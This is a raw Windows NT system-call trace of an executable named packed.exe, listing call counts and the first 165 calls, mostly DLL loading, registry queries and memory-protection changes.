Summary:





NtAddAtom(>)  1 
NtGdiHfontCreate(>)  2 
NtUserGetProcessWindowStation(>)  5 
NtWaitForSingleObject(>)  22 


NtCallbackReturn(>)  1 
NtOpenDirectoryObject(>)  2 
NtWriteFile(>)  6 
NtCreateEvent(>)  23 


NtCreateMutant(>)  1 
NtOpenEvent(>)  2 
NtOpenThreadToken(>)  7 
NtCreateFile(>)  25 


NtDelayExecution(>)  1 
NtOpenProcess(>)  2 
NtSetEvent(>)  7 
NtQueryInformationFile(>)  26 


NtEnumerateValueKey(>)  1 
NtQueryInformationJobObject(>)  2 
NtSetValueKey(>)  7 
NtQueryInformationProcess(>)  32 


NtFsControlFile(>)  1 
NtRegisterThreadTerminatePort(>)  2 
NtOpenMutant(>)  8 
NtOpenProcessTokenEx(>)  34 


NtGdiCreateBitmap(>)  1 
NtSetEventBoostPriority(>)  2 
NtWriteVirtualMemory(>)  8 
NtOpenThreadTokenEx(>)  34 


NtGdiCreatePatternBrushInternal(>)  1 
NtTestAlert(>)  2 
NtUserCallNoParam(>)  9 
NtCreateSection(>)  36 


NtGdiInit(>)  1 
NtClearEvent(>)  3 
NtCreateKey(>)  10 
NtOpenSection(>)  40 


NtGdiQueryFontAssocInfo(>)  1 
NtContinue(>)  3 
NtOpenProcessToken(>)  10 
NtQuerySystemInformation(>)  42 


NtGdiSelectBitmap(>)  1 
NtCreateThread(>)  3 
NtQueryDefaultUILanguage(>)  10 
NtQueryInformationToken(>)  43 


NtOpenKeyedEvent(>)  1 
NtDuplicateObject(>)  3 
NtUserGetWindowDC(>)  10 
NtFreeVirtualMemory(>)  47 


NtQueryEvent(>)  1 
NtGdiCreateCompatibleDC(>)  3 
NtCreateSemaphore(>)  11 
NtUserGetAtomName(>)  47 


NtQueryInformationThread(>)  1 
NtGdiDeleteObjectApp(>)  3 
NtEnumerateKey(>)  12 
NtUserUnregisterClass(>)  47 


NtQueryInstallUILanguage(>)  1 
NtNotifyChangeKey(>)  3 
NtReleaseMutant(>)  12 
NtUserFindExistingCursorIcon(>)  50 


NtQueryObject(>)  1 
NtOpenSymbolicLinkObject(>)  3 
NtUserCallOneParam(>)  12 
NtQueryVirtualMemory(>)  57 


NtQueryTimerResolution(>)  1 
NtQueryPerformanceCounter(>)  3 
NtUserSystemParametersInfo(>)  12 
NtUserRegisterClassExWOW(>)  61 


NtReadFile(>)  1 
NtQuerySymbolicLinkObject(>)  3 
NtSetInformationThread(>)  13 
NtMapViewOfSection(>)  62 


NtSecureConnectPort(>)  1 
NtReleaseSemaphore(>)  3 
NtQueryDirectoryFile(>)  14 
NtOpenFile(>)  72 


NtUserBuildNameList(>)  1 
NtResumeThread(>)  3 
NtQueryVolumeInformationFile(>)  16 
NtQueryAttributesFile(>)  85 


NtUserCloseDesktop(>)  1 
NtTerminateProcess(>)  3 
NtRequestWaitReplyPort(>)  16 
NtUserValidateHandleSecure(>)  130 


NtUserGetDC(>)  1 
NtUserOpenDesktop(>)  3 
NtSetInformationProcess(>)  16 
NtFlushInstructionCache(>)  135 


NtUserGetGUIThreadInfo(>)  1 
NtWaitForMultipleObjects(>)  3 
NtSetInformationFile(>)  17 
NtUserQueryWindow(>)  160 


NtUserGetObjectInformation(>)  1 
NtSetInformationObject(>)  4 
NtQueryDebugFilterState(>)  18 
NtAllocateVirtualMemory(>)  212 


NtUserGetThreadDesktop(>)  1 
NtAccessCheck(>)  5 
NtDeviceIoControlFile(>)  19 
NtProtectVirtualMemory(>)  276 


NtConnectPort(>)  2 
NtGdiGetStockObject(>)  5 
NtQueryDefaultLocale(>)  19 
NtOpenKey(>)  321 


NtCreateProcessEx(>)  2 
NtQueryKey(>)  5 
NtQuerySection(>)  19 
NtClose(>)  376 


NtDuplicateToken(>)  2 
NtReadVirtualMemory(>)  5 
NtUnmapViewOfSection(>)  20 
NtQueryValueKey(>)  428 


NtGdiCreateSolidBrush(>)  2 
NtUserBuildHwndList(>)  5 
NtUserRegisterWindowMessage(>)  20 



Trace:

 00001   748   NtOpenFile  (0x80100000, {24, 0, 0x240, 0, 0,  (0x80100000, {24, 0, 0x240, 0, 0, "\SystemRoot\Prefetch\PACKED.EXE-09ED06A1.pf"}, 0, 32, ... ) }, 0, 32, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00002   748   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\packed.exe"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00003   748   NtOpenKeyedEvent  (0x2000000, {24, 0, 0x0, 0, 0,  (0x2000000, {24, 0, 0x0, 0, 0, "\KernelObjects\CritSecOutOfMemoryEvent"}, ... 4, ) }, ... 4, ) == 0x0
 00004   748   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 00005   748   NtAllocateVirtualMemory  (-1, 0, 0, 1048576, 8192, 4, ... 1310720, 1048576, ) == 0x0
 00006   748   NtAllocateVirtualMemory  (-1, 1310720, 0, 4096, 4096, 4, ... 1310720, 4096, ) == 0x0
 00007   748   NtAllocateVirtualMemory  (-1, 1314816, 0, 8192, 4096, 4, ... 1314816, 8192, ) == 0x0
 00008   748   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 00009   748   NtAllocateVirtualMemory  (-1, 0, 0, 65536, 8192, 4, ... 2359296, 65536, ) == 0x0
 00010   748   NtAllocateVirtualMemory  (-1, 2359296, 0, 24576, 4096, 4, ... 2359296, 24576, ) == 0x0
 00011   748   NtOpenDirectoryObject  (0x3, {24, 0, 0x40, 0, 0,  (0x3, {24, 0, 0x40, 0, 0, "\KnownDlls"}, ... 8, ) }, ... 8, ) == 0x0
 00012   748   NtOpenSymbolicLinkObject  (0x1, {24, 8, 0x40, 0, 0,  (0x1, {24, 8, 0x40, 0, 0, "KnownDllPath"}, ... 12, ) }, ... 12, ) == 0x0
 00013   748   NtQuerySymbolicLinkObject  (12, ...  (12, ... "C:\WINDOWS\system32", 0x0, ) , 0x0, ) == 0x0
 00014   748   NtClose  (12, ... ) == 0x0
 00015   748   NtOpenFile  (0x100020, {24, 0, 0x42, 0, 0,  (0x100020, {24, 0, 0x42, 0, 0, "\??\C:\scripts\"}, 3, 33, ... 12, {status=0x0, info=1}, ) }, 3, 33, ... 12, {status=0x0, info=1}, ) == 0x0
 00016   748   NtQueryVolumeInformationFile  (12, 1243852, 8, Device, ... {status=0x0, info=8}, ) == 0x0
 00017   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\packed.exe.Local"}, 1243804, ... ) }, 1243804, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00018   748   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "kernel32.dll"}, ... 16, ) }, ... 16, ) == 0x0
 00019   748   NtMapViewOfSection  (16, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x7c800000), 0x0, 1003520, ) == 0x0
 00020   748   NtClose  (16, ... ) == 0x0
 00021   748   NtProtectVirtualMemory  (-1, (0x7c801000), 1568, 4, ... (0x7c801000), 4096, 32, ) == 0x0
 00022   748   NtProtectVirtualMemory  (-1, (0x7c801000), 4096, 32, ... (0x7c801000), 4096, 4, ) == 0x0
 00023   748   NtFlushInstructionCache  (-1, 2088767488, 1568, ... ) == 0x0
 00024   748   NtQueryInformationProcess  (-1, 36, 4, ... {process info, class 36, size 4}, 0x0, ) == 0x0
 00025   748   NtQuerySystemInformation  (RangeStart, 4, ... {system info, class 50, size 4}, 0x0, ) == 0x0
 00026   748   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 00027   748   NtCreateSection  (0xf001f, 0x0, {65536, 0}, 4, 67108864, 0, ... 16, ) == 0x0
 00028   748   NtSecureConnectPort  ( ("\Windows\ApiPort", {0, 2, 1, 1}, {24, 16, 0, 65536, 0, 0}, 1319736, {12, 0, 0}, 1241944, 44, ... 24, {24, 16, 0, 65536, 2424832, 18415616}, {0, 0, 0}, 200, 44, ) , {0, 2, 1, 1}, {24, 16, 0, 65536, 0, 0}, 1319736, {12, 0, 0}, 1241944, 44, ... 24, {24, 16, 0, 65536, 2424832, 18415616}, {0, 0, 0}, 200, 44, ) == 0x0
 00029   748   NtClose  (16, ... ) == 0x0
 00030   748   NtQueryObject  (24, Handle, 2, ... {Inherit=0,ProtectFromClose=0,}, -1, ) == 0x0
 00031   748   NtSetInformationObject  (24, Handle, {Inherit=0,ProtectFromClose=1,}, 256, ... ) == 0x0
 00032   748   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 00033   748   NtQueryVirtualMemory  (-1, 0x250000, Basic, 28, ... {BaseAddress=0x250000,AllocationBase=0x250000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x40000,}, 0x0, ) == 0x0
 00034   748   NtAllocateVirtualMemory  (-1, 2424832, 0, 4096, 4096, 4, ... 2424832, 4096, ) == 0x0
 00035   748   NtRequestWaitReplyPort  (24, {28, 56, new_msg, 0, 1242260, 1242460, 2089900544, 1242184}  (24, {28, 56, new_msg, 0, 1242260, 1242460, 2089900544, 1242184} "\210\6\31\1\0\0\0\0eZ\221|\0\0\0\0\1\0\0\0\234\6\31\1\4\0\0\0" ... {28, 56, reply, 0, 484, 748, 57961, 0} "`\375\27\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\234\6\31\1\4\0\0\0" )  ... {28, 56, reply, 0, 484, 748, 57961, 0}  (24, {28, 56, new_msg, 0, 1242260, 1242460, 2089900544, 1242184} "\210\6\31\1\0\0\0\0eZ\221|\0\0\0\0\1\0\0\0\234\6\31\1\4\0\0\0" ... {28, 56, reply, 0, 484, 748, 57961, 0} "`\375\27\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\234\6\31\1\4\0\0\0" )  ) == 0x0
 00036   748   NtRegisterThreadTerminatePort  (24, ... ) == 0x0
 00037   748   NtAllocateVirtualMemory  (-1, 1232896, 0, 4096, 4096, 260, ... 1232896, 4096, ) == 0x0
 00038   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\System\CurrentControlSet\Control\Terminal Server"}, ... 16, ) }, ... 16, ) == 0x0
 00039   748   NtQueryValueKey  (16,  (16, "TSAppCompat", Partial, 548, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 548, ... TitleIdx=0, Type=4, Data= (16, "TSAppCompat", Partial, 548, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 00040   748   NtClose  (16, ... ) == 0x0
 00041   748   NtOpenSection  (0x4, {24, 0, 0x40, 0, 0,  (0x4, {24, 0, 0x40, 0, 0, "\NLS\NlsSectionUnicode"}, ... 16, ) }, ... 16, ) == 0x0
 00042   748   NtMapViewOfSection  (16, -1, (0x0), 0, 0, 0x0, 0, 2, 0, 2, ... (0x260000), 0x0, 90112, ) == 0x0
 00043   748   NtClose  (16, ... ) == 0x0
 00044   748   NtQueryDefaultLocale  (0, 2089305000, ... ) == 0x0
 00045   748   NtOpenSection  (0x4, {24, 0, 0x40, 0, 0,  (0x4, {24, 0, 0x40, 0, 0, "\NLS\NlsSectionLocale"}, ... 16, ) }, ... 16, ) == 0x0
 00046   748   NtMapViewOfSection  (16, -1, (0x0), 0, 0, 0x0, 0, 2, 0, 2, ... (0x280000), 0x0, 249856, ) == 0x0
 00047   748   NtClose  (16, ... ) == 0x0
 00048   748   NtOpenSection  (0x5, {24, 0, 0x40, 0, 0,  (0x5, {24, 0, 0x40, 0, 0, "\NLS\NlsSectionSortkey"}, ... 16, ) }, ... 16, ) == 0x0
 00049   748   NtMapViewOfSection  (16, -1, (0x0), 0, 0, 0x0, 0, 2, 0, 2, ... (0x2c0000), 0x0, 266240, ) == 0x0
 00050   748   NtQuerySection  (16, Basic, 16, ... {BaseAddress=0x0,Attributes=0x800000,Size={0x40004, 0x0},}, 0x0, ) == 0x0
 00051   748   NtClose  (16, ... ) == 0x0
 00052   748   NtOpenSection  (0x4, {24, 0, 0x40, 0, 0,  (0x4, {24, 0, 0x40, 0, 0, "\NLS\NlsSectionSortTbls"}, ... 16, ) }, ... 16, ) == 0x0
 00053   748   NtMapViewOfSection  (16, -1, (0x0), 0, 0, 0x0, 0, 2, 0, 2, ... (0x310000), 0x0, 24576, ) == 0x0
 00054   748   NtClose  (16, ... ) == 0x0
 00055   748   NtQueryVirtualMemory  (-1, 0x7ffd2000, Basic, 28, ... {BaseAddress=0x7ffd2000,AllocationBase=0x7ffb0000,AllocationProtect=0x2,RegionSize=0x2000,State=0x1000,Protect=0x2,Type=0x40000,}, 0x0, ) == 0x0
 00056   748   NtOpenSection  (0x4, {24, 0, 0x40, 0, 0,  (0x4, {24, 0, 0x40, 0, 0, "\NLS\NlsSectionSortkey00000409"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00057   748   NtOpenSection  (0x4, {24, 0, 0x40, 0, 0,  (0x4, {24, 0, 0x40, 0, 0, "\NLS\NlsSectionSortkey00000409"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00058   748   NtAllocateVirtualMemory  (-1, 2428928, 0, 8192, 4096, 4, ... 2428928, 8192, ) == 0x0
 00059   748   NtRequestWaitReplyPort  (24, {24, 52, new_msg, 0, 7012468, 7929957, 3145776, 3145776}  (24, {24, 52, new_msg, 0, 7012468, 7929957, 3145776, 3145776} "\210\6\31\1\36\0\1\0\0\0\0\0\377\377\377\377\234\6\31\1p\30\0\0" ... {24, 52, reply, 0, 484, 748, 57962, 0} "\10P\30\0\36\0\1\0\0\0\0\0\377\377\377\377\234\6\31\1p\30\0\0" )  ... {24, 52, reply, 0, 484, 748, 57962, 0}  (24, {24, 52, new_msg, 0, 7012468, 7929957, 3145776, 3145776} "\210\6\31\1\36\0\1\0\0\0\0\0\377\377\377\377\234\6\31\1p\30\0\0" ... {24, 52, reply, 0, 484, 748, 57962, 0} "\10P\30\0\36\0\1\0\0\0\0\0\377\377\377\377\234\6\31\1p\30\0\0" )  ) == 0x0
 00060   748   NtRequestWaitReplyPort  (24, {28, 56, new_msg, 0, 2089305760, 2090321376, 0, 0}  (24, {28, 56, new_msg, 0, 2089305760, 2090321376, 0, 0} "\210\6\31\1\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\234\6\31\18\6\0\0" ... {28, 56, reply, 0, 484, 748, 57963, 0} "\250\202\26\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\234\6\31\18\6\0\0" )  ... {28, 56, reply, 0, 484, 748, 57963, 0}  (24, {28, 56, new_msg, 0, 2089305760, 2090321376, 0, 0} "\210\6\31\1\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\234\6\31\18\6\0\0" ... {28, 56, reply, 0, 484, 748, 57963, 0} "\250\202\26\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\234\6\31\18\6\0\0" )  ) == 0x0
 00061   748   NtProtectVirtualMemory  (-1, (0x46b000), 106496, 4, ... (0x46b000), 106496, 128, ) == 0x0
 00062   748   NtProtectVirtualMemory  (-1, (0x46b000), 106496, 128, ... (0x46b000), 106496, 4, ) == 0x0
 00063   748   NtFlushInstructionCache  (-1, 4632576, 106496, ... ) == 0x0
 00064   748   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "ws2_32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00065   748   NtAllocateVirtualMemory  (-1, 1323008, 0, 4096, 4096, 4, ... 1323008, 4096, ) == 0x0
 00066   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\ws2_32.dll"}, 1242572, ... ) }, 1242572, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00067   748   NtFsControlFile  (12, 0, 0x0, 0x0, 0x90028, 0x0, 0, 0, ... {status=0x0, info=0}, 0x0, ) == 0x0
 00068   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\ws2_32.dll"}, 1242572, ... ) }, 1242572, ... ) == 0x0
 00069   748   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\ws2_32.dll"}, 5, 96, ... 16, {status=0x0, info=1}, ) }, 5, 96, ... 16, {status=0x0, info=1}, ) == 0x0
 00070   748   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 16, ... 28, ) == 0x0
 00071   748   NtQuerySection  (28, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 00072   748   NtOpenProcessToken  (-1, 0x8, ... 32, ) == 0x0
 00073   748   NtQueryInformationToken  (32, User, 136, ... {token info, class 1, size 36}, 36, ) == 0x0
 00074   748   NtOpenKey  (0x3, {24, 0, 0x40, 0, 0,  (0x3, {24, 0, 0x40, 0, 0, "\Registry\MACHINE\System\CurrentControlSet\Control\SafeBoot\Option"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00075   748   NtOpenKey  (0x1, {24, 0, 0x40, 0, 0,  (0x1, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers"}, ... 36, ) }, ... 36, ) == 0x0
 00076   748   NtQueryValueKey  (36,  (36, "TransparentEnabled", Partial, 80, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 80, ... TitleIdx=0, Type=4, Data= (36, "TransparentEnabled", Partial, 80, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 00077   748   NtClose  (36, ... ) == 0x0
 00078   748   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 00079   748   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 36, ) == 0x0
 00080   748   NtQueryInformationToken  (36, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 00081   748   NtClose  (36, ... ) == 0x0
 00082   748   NtOpenKey  (0x1, {24, 0, 0x40, 0, 0,  (0x1, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00083   748   NtClose  (32, ... ) == 0x0
 00084   748   NtClose  (16, ... ) == 0x0
 00085   748   NtMapViewOfSection  (28, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x71ab0000), 0x0, 94208, ) == 0x0
 00086   748   NtClose  (28, ... ) == 0x0
 00087   748   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "msvcrt.dll"}, ... 28, ) }, ... 28, ) == 0x0
 00088   748   NtMapViewOfSection  (28, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x77c10000), 0x0, 360448, ) == 0x0
 00089   748   NtClose  (28, ... ) == 0x0
 00090   748   NtProtectVirtualMemory  (-1, (0x77c11000), 632, 4, ... (0x77c11000), 4096, 32, ) == 0x0
 00091   748   NtProtectVirtualMemory  (-1, (0x77c11000), 4096, 32, ... (0x77c11000), 4096, 4, ) == 0x0
 00092   748   NtFlushInstructionCache  (-1, 2009141248, 632, ... ) == 0x0
 00093   748   NtProtectVirtualMemory  (-1, (0x71ab1000), 468, 4, ... (0x71ab1000), 4096, 32, ) == 0x0
 00094   748   NtProtectVirtualMemory  (-1, (0x71ab1000), 4096, 32, ... (0x71ab1000), 4096, 4, ) == 0x0
 00095   748   NtFlushInstructionCache  (-1, 1907036160, 468, ... ) == 0x0
 00096   748   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "WS2HELP.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00097   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\WS2HELP.dll"}, 1241756, ... ) }, 1241756, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00098   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\WS2HELP.dll"}, 1241756, ... ) }, 1241756, ... ) == 0x0
 00099   748   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\WS2HELP.dll"}, 5, 96, ... 28, {status=0x0, info=1}, ) }, 5, 96, ... 28, {status=0x0, info=1}, ) == 0x0
 00100   748   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 28, ... 16, ) == 0x0
 00101   748   NtQuerySection  (16, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 00102   748   NtClose  (28, ... ) == 0x0
 00103   748   NtMapViewOfSection  (16, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x71aa0000), 0x0, 32768, ) == 0x0
 00104   748   NtClose  (16, ... ) == 0x0
 00105   748   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "ADVAPI32.dll"}, ... 16, ) }, ... 16, ) == 0x0
 00106   748   NtMapViewOfSection  (16, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x77dd0000), 0x0, 634880, ) == 0x0
 00107   748   NtClose  (16, ... ) == 0x0
 00108   748   NtProtectVirtualMemory  (-1, (0x77dd1000), 1700, 4, ... (0x77dd1000), 4096, 32, ) == 0x0
 00109   748   NtProtectVirtualMemory  (-1, (0x77dd1000), 4096, 32, ... (0x77dd1000), 4096, 4, ) == 0x0
 00110   748   NtFlushInstructionCache  (-1, 2010976256, 1700, ... ) == 0x0
 00111   748   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "RPCRT4.dll"}, ... 16, ) }, ... 16, ) == 0x0
 00112   748   NtMapViewOfSection  (16, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x77e70000), 0x0, 593920, ) == 0x0
 00113   748   NtClose  (16, ... ) == 0x0
 00114   748   NtProtectVirtualMemory  (-1, (0x77e71000), 868, 4, ... (0x77e71000), 4096, 32, ) == 0x0
 00115   748   NtProtectVirtualMemory  (-1, (0x77e71000), 4096, 32, ... (0x77e71000), 4096, 4, ) == 0x0
 00116   748   NtFlushInstructionCache  (-1, 2011631616, 868, ... ) == 0x0
 00117   748   NtProtectVirtualMemory  (-1, (0x77e71000), 868, 4, ... (0x77e71000), 4096, 32, ) == 0x0
 00118   748   NtProtectVirtualMemory  (-1, (0x77e71000), 4096, 32, ... (0x77e71000), 4096, 4, ) == 0x0
 00119   748   NtFlushInstructionCache  (-1, 2011631616, 868, ... ) == 0x0
 00120   748   NtProtectVirtualMemory  (-1, (0x77e71000), 868, 4, ... (0x77e71000), 4096, 32, ) == 0x0
 00121   748   NtProtectVirtualMemory  (-1, (0x77e71000), 4096, 32, ... (0x77e71000), 4096, 4, ) == 0x0
 00122   748   NtFlushInstructionCache  (-1, 2011631616, 868, ... ) == 0x0
 00123   748   NtProtectVirtualMemory  (-1, (0x77dd1000), 1700, 4, ... (0x77dd1000), 4096, 32, ) == 0x0
 00124   748   NtProtectVirtualMemory  (-1, (0x77dd1000), 4096, 32, ... (0x77dd1000), 4096, 4, ) == 0x0
 00125   748   NtFlushInstructionCache  (-1, 2010976256, 1700, ... ) == 0x0
 00126   748   NtProtectVirtualMemory  (-1, (0x71aa1000), 352, 4, ... (0x71aa1000), 4096, 32, ) == 0x0
 00127   748   NtProtectVirtualMemory  (-1, (0x71aa1000), 4096, 32, ... (0x71aa1000), 4096, 4, ) == 0x0
 00128   748   NtFlushInstructionCache  (-1, 1906970624, 352, ... ) == 0x0
 00129   748   NtProtectVirtualMemory  (-1, (0x71ab1000), 468, 4, ... (0x71ab1000), 4096, 32, ) == 0x0
 00130   748   NtProtectVirtualMemory  (-1, (0x71ab1000), 4096, 32, ... (0x71ab1000), 4096, 4, ) == 0x0
 00131   748   NtFlushInstructionCache  (-1, 1907036160, 468, ... ) == 0x0
 00132   748   NtProtectVirtualMemory  (-1, (0x46b000), 106496, 4, ... (0x46b000), 106496, 64, ) == 0x0
 00133   748   NtProtectVirtualMemory  (-1, (0x46b000), 106496, 64, ... (0x46b000), 106496, 4, ) == 0x0
 00134   748   NtFlushInstructionCache  (-1, 4632576, 106496, ... ) == 0x0
 00135   748   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "oleaut32.dll"}, ... 16, ) }, ... 16, ) == 0x0
 00136   748   NtMapViewOfSection  (16, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x77120000), 0x0, 569344, ) == 0x0
 00137   748   NtClose  (16, ... ) == 0x0
 00138   748   NtProtectVirtualMemory  (-1, (0x77121000), 1272, 4, ... (0x77121000), 4096, 32, ) == 0x0
 00139   748   NtProtectVirtualMemory  (-1, (0x77121000), 4096, 32, ... (0x77121000), 4096, 4, ) == 0x0
 00140   748   NtFlushInstructionCache  (-1, 1997672448, 1272, ... ) == 0x0
 00141   748   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "GDI32.dll"}, ... 16, ) }, ... 16, ) == 0x0
 00142   748   NtMapViewOfSection  (16, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x77f10000), 0x0, 290816, ) == 0x0
 00143   748   NtClose  (16, ... ) == 0x0
 00144   748   NtProtectVirtualMemory  (-1, (0x77f11000), 508, 4, ... (0x77f11000), 4096, 32, ) == 0x0
 00145   748   NtProtectVirtualMemory  (-1, (0x77f11000), 4096, 32, ... (0x77f11000), 4096, 4, ) == 0x0
 00146   748   NtFlushInstructionCache  (-1, 2012286976, 508, ... ) == 0x0
 00147   748   NtProtectVirtualMemory  (-1, (0x77f11000), 508, 4, ... (0x77f11000), 4096, 32, ) == 0x0
 00148   748   NtProtectVirtualMemory  (-1, (0x77f11000), 4096, 32, ... (0x77f11000), 4096, 4, ) == 0x0
 00149   748   NtFlushInstructionCache  (-1, 2012286976, 508, ... ) == 0x0
 00150   748   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "USER32.dll"}, ... 16, ) }, ... 16, ) == 0x0
 00151   748   NtMapViewOfSection  (16, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x7e410000), 0x0, 589824, ) == 0x0
 00152   748   NtClose  (16, ... ) == 0x0
 00153   748   NtProtectVirtualMemory  (-1, (0x7e411000), 1252, 4, ... (0x7e411000), 4096, 32, ) == 0x0
 00154   748   NtProtectVirtualMemory  (-1, (0x7e411000), 4096, 32, ... (0x7e411000), 4096, 4, ) == 0x0
 00155   748   NtFlushInstructionCache  (-1, 2118193152, 1252, ... ) == 0x0
 00156   748   NtProtectVirtualMemory  (-1, (0x7e411000), 1252, 4, ... (0x7e411000), 4096, 32, ) == 0x0
 00157   748   NtProtectVirtualMemory  (-1, (0x7e411000), 4096, 32, ... (0x7e411000), 4096, 4, ) == 0x0
 00158   748   NtFlushInstructionCache  (-1, 2118193152, 1252, ... ) == 0x0
 00159   748   NtProtectVirtualMemory  (-1, (0x7e411000), 1252, 4, ... (0x7e411000), 4096, 32, ) == 0x0
 00160   748   NtProtectVirtualMemory  (-1, (0x7e411000), 4096, 32, ... (0x7e411000), 4096, 4, ) == 0x0
 00161   748   NtFlushInstructionCache  (-1, 2118193152, 1252, ... ) == 0x0
 00162   748   NtProtectVirtualMemory  (-1, (0x77f11000), 508, 4, ... (0x77f11000), 4096, 32, ) == 0x0
 00163   748   NtProtectVirtualMemory  (-1, (0x77f11000), 4096, 32, ... (0x77f11000), 4096, 4, ) == 0x0
 00164   748   NtFlushInstructionCache  (-1, 2012286976, 508, ... ) == 0x0
 00165   748   NtProtectVirtualMemory  (-1, (0x77121000), 1272, 4, ... (0x77121000), 4096, 32, ) == 0x0
